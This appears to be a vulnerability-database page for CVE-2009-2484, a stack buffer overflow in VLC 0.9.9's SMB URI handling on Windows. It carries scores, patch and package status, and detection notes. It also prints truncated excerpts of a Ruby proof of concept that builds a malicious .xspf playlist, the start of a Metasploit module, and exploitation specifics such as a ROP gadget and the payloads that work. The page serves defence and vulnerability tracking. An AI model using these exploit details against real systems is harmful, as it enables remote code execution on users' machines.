CVE-2009-2484
published 2009-07-16CVE-2009-2484: Stack-based buffer overflow in the Win32AddConnection function in modules/access/smb.c in VideoLAN VLC media player 0.9.9, when running on Microsoft Windows…
PriorityP351critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
35.11%
98.2th percentile
Stack-based buffer overflow in the Win32AddConnection function in modules/access/smb.c in VideoLAN VLC media player 0.9.9, when running on Microsoft Windows, allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a long smb URI in a playlist file.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | vlc | — | — |
| videolan | vlc_media_player | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect malicious .xspf playlist files containing an oversized smb:// URI — the exploit embeds the payload in the URI formatted as smb://<payload>@<host>/<share>/ ↗
- →The exploit targets libvout_directx_plugin.dll with a ROP gadget (add esp,0xcc / pop ebx / pop esi / pop edi / pop ebp / ret); presence of this DLL in VLC process memory combined with smb:// URI processing is a strong indicator ↗
- →Payload space is limited to 1024 bytes and null bytes are bad characters; the smb:// URI structure places the encoded payload in the username field before the @ sign ↗
- ·The vulnerability is only present in Win32 builds of VLC; Linux/macOS builds are not affected ↗
- ·Affected versions are 0.9.9 through 1.0.1; the Metasploit target is specifically tuned for VLC 0.9.9 on Windows XP SP3 ↗
- ·The VLC web interface trigger vector requires the web interface to be enabled (disabled by default); the primary attack vector is a crafted .xspf playlist file ↗
- ·The windows/meterpreter/reverse_ord_tcp payload does not work with this exploit; only windows/exec and windows/meterpreter/reverse_tcp were confirmed functional ↗
CVSS provenance
nvdv2.09.3CRITICALAV:N/AC:M/Au:N/C:C/I:C/A:C
vendor_debian9.3LOW
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-mv28-cc94-6wvh: Stack-based buffer overflow in the Win32AddConnection function in modules/access/smb
ghsa_unreviewed·2022-05-02
CVE-2009-2484 [HIGH] CWE-119 GHSA-mv28-cc94-6wvh: Stack-based buffer overflow in the Win32AddConnection function in modules/access/smb
Stack-based buffer overflow in the Win32AddConnection function in modules/access/smb.c in VideoLAN VLC media player 0.9.9, when running on Microsoft Windows, allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a long smb URI in a playlist file.
Debian
CVE-2009-2484: vlc - Stack-based buffer overflow in the Win32AddConnection function in modules/access...
vendor_debian·2009·CVSS 9.3
CVE-2009-2484 [CRITICAL] CVE-2009-2484: vlc - Stack-based buffer overflow in the Win32AddConnection function in modules/access...
Stack-based buffer overflow in the Win32AddConnection function in modules/access/smb.c in VideoLAN VLC media player 0.9.9, when running on Microsoft Windows, allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a long smb URI in a playlist file.
Scope: local
bookworm: resolved
bullseye: resolved
forky: resolved
sid: resolved
trixie: resolved
No detection rules found.
Exploit-DB
VideoLAN VLC Client (Windows x86) - 'smb://' URI Buffer Overflow (Metasploit)
exploitdb·2010-09-20
CVE-2009-2484 VideoLAN VLC Client (Windows x86) - 'smb://' URI Buffer Overflow (Metasploit)
VideoLAN VLC Client (Windows x86) - 'smb://' URI Buffer Overflow (Metasploit)
---
##
# $Id: vlc_smb_uri.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'VideoLAN Client (VLC) Win32 smb:// URI Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow in the Win32AddConnection
function of the VideoLAN VLC media player. Versions 0.9.9 throught 1.0.1 are
reportedly affected.
This vulnerability is only present in Win32 builds of VLC.
This payload was found to work with the wi
Exploit-DB
VideoLAN VLC Media Player 0.9.9 - 'smb://' URI Stack Buffer Overflow (PoC)
exploitdb·2009-06-29
CVE-2009-2484 VideoLAN VLC Media Player 0.9.9 - 'smb://' URI Stack Buffer Overflow (PoC)
VideoLAN VLC Media Player 0.9.9 - 'smb://' URI Stack Buffer Overflow (PoC)
---
#!/usr/bin/ruby
# VideoLAN VLC Media Player 0.9.9 smb:// URI Stack-based Buffer Overflow (Proof-of-Concept)
#
# Bugtraq ID: 35500
#
# The vulnerability can also be triggered via the VLC web interface (disabled by default):
# http://[vulnerable_ip]:8080/requests/status.xml?command=in_play&input=smb://............
#
# Patch:
# http://git.videolan.org/?p=vlc.git;a=commitdiff;h=e60a9038b13b5eb805a76755efc5c6d5e080180f
#
# Tested on Windows XP SP3 (fully patched), VLC player version 0.9.9 (latest).
#
# Trancer
# http://www.rec-sec.com
foo = "A" * 58
bar = "B" * 4
baz = "C" * 1000
b00m = foo + bar + baz
xspf = %Q|
Playlist
smb://[email protected]/foo/#{b00m}
0
|
playlist = File.new("vlc_smb.xspf","wb"
Metasploit
VideoLAN Client (VLC) Win32 smb:// URI Buffer Overflow
metasploit
VideoLAN Client (VLC) Win32 smb:// URI Buffer Overflow
VideoLAN Client (VLC) Win32 smb:// URI Buffer Overflow
This module exploits a stack-based buffer overflow in the Win32AddConnection function of the VideoLAN VLC media player. Versions 0.9.9 through 1.0.1 are reportedly affected. This vulnerability is only present in Win32 builds of VLC. This payload was found to work with the windows/exec and windows/meterpreter/reverse_tcp payloads. However, the windows/meterpreter/reverse_ord_tcp was found not to work.
No writeups or analysis indexed.
http://git.videolan.org/?p=vlc.git%3Ba=commit%3Bh=e60a9038b13b5eb805a76755efc5c6d5e080180fhttp://secunia.com/advisories/35558http://www.exploit-db.com/exploits/9029http://www.securityfocus.com/bid/35500http://www.vupen.com/english/advisories/2009/1714https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A14800http://git.videolan.org/?p=vlc.git%3Ba=commit%3Bh=e60a9038b13b5eb805a76755efc5c6d5e080180fhttp://secunia.com/advisories/35558http://www.exploit-db.com/exploits/9029http://www.securityfocus.com/bid/35500http://www.vupen.com/english/advisories/2009/1714https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A14800
2009-07-16
Published